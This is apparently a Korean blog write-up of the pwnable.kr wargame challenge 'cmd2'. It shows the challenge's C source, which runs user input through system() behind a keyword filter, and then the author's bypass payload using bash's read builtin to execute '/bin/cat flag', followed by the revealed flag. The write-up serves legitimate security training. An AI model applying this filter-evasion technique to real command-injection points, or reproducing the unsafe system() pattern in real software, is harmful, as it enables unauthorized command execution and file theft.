cmd2 - 9 pt
Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!
ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)
비밀번호는 cmd1문제의 플래그다.
cmd2@ubuntu:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd2_pwn 8794 Dec 21 2015 cmd2
-rw-r--r-- 1 root root 586 Dec 21 2015 cmd2.c
-r--r----- 1 root cmd2_pwn 30 Jul 14 2015 flag
cmd2@ubuntu:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
일단 환경변수 메모리 부분을 모두 초기화 한다.
그리고 입력값에서 "=", "PATH", "export", "/", "`", "flag" 를 필터링한다.
"/" 를 필터링하면서, /bin/cat을 사용하기 어려워졌다..ㅠㅠ
그러면, bash의 기본 함수인 read를 이용해서 플래그를 얻어야 할 것 같다.
cmd2@ubuntu:~$ ./cmd2 "read a; \$a"
read a; $a
/bin/cat flag
FuN_w1th_5h3ll_v4riabl3s_haha
FLAG : FuN_w1th_5h3ll_v4riabl3s_haha
'WAR GAME > Pwnable.kr' 카테고리의 다른 글
| pwnable.kr [memcpy] 풀이 (0) | 2018.06.12 |
|---|---|
| pwnable.kr [uaf] 풀이 (1) | 2018.06.11 |
| pwnable.kr [cmd1] 풀이 (0) | 2018.03.22 |
| pwnable.kr [lotto] 풀이 (0) | 2018.03.18 |
| pwnable.kr [blackjack] 풀이 (0) | 2018.03.18 |